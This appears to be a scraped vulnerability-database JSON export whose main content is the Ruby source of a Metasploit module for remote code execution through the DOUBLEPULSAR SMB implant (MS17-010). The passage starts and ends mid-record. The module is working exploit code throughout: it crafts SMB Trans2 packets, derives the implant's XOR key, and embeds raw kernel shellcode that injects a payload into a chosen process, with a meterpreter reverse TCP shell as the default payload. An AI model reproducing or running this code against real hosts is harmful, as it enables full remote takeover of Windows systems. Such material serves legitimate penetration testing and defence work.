make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-16] #"}, "lastseen": "2021-10-15T22:16:39", "differentElements": ["sourceData"], "edition": 45}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "1036ec27cd4d48d9ecbdf9f6c3e4b5b1", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-16T22:15:48", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-15T22:16:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-15T22:16:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 